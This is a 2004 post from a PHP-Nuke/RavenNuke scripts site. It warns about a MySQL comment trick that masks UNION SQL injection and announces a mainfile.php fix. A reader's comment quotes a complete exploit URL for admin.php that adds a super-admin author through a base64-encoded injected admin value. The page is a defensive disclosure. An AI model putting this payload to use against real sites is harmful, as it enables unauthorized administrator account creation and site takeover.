Great Reviews!Need help setting up your website, installing Apache, PHP, MySQL, or RavenNuke(tm)?Need help customizing or designing scripts?Please contact us via the Contact Us option for further details and pricing.
There is a MySQL exploit that can be used to 'mask' the union attack. MySQL and a few other rdbms's allow a comment /* */ to be placed in the Query as a hint to MySQL to override it's determined course. This is being exploited by some kiddies out there. Read about the modification to the mainfile.php code that I'm testing and I welcome your tests too.
UPDATE 4/28/2004: The hackalert download file now includes this fix. There is no need to redownload if you have already applied the fix in the post mentioned above. Thanks to those who tested this!
Posted on Tuesday, April 27, 2004 @ 11:13:57 EDT by Raven
Re: Raven's Hack Alert Script (Score: 1) by ballymuntrev(abuse@microsoft.com) on Friday, April 30, 2004 @ 12:28:13 EDT Not registered user
Hey Raven, is it possible to update your script to protect against the following hack, which seems to be doing the rounds :(
http://yoursite/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo bar com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
